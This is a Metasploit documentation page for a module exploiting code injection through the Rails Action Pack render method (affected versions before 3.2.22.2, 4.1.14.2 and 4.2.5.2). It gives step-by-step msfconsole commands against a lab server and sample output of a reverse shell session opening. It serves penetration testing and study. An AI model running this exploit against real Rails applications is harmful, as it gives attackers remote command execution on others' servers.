metasploit-gs/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md

rails_actionpack_inine_exec is a module that exploits the render method in Action Pack. Applications that pass unverified user input to the render method in a controller or view may be vulnerable to code injection.

Vulnerable Application

Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.

Verification Steps

Assuming you have the right requirements to run a rails server, you can use the following fork to set up the vulnerable server for testing:

1. Do: git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git
2. Do: bundle install
3. Do: rails -s -b 0.0.0.0
4. Start msfconsole
5. Do: use exploit/multi/http/rails_actionpack_inline_exec
6. Do: set RHOST [rails server IP]
7. Do: set RPORT 3000. 3000 is the default port for the rails server.
8. Do: set targeturi /exploits
9. Configure the rest of the options (for the modules or the payload)
10. Do: exploit, and you should get a session:

msf exploit(rails_actionpack_inline_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Sending inline code to parameter: id
[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500

Options

To use this module, you must manually discover the correct values for these datastore options:

TARGETURI

The path to a vulnerable Ruby on Rails application.

TARGETPARAM

The target parameter to inject with inline code.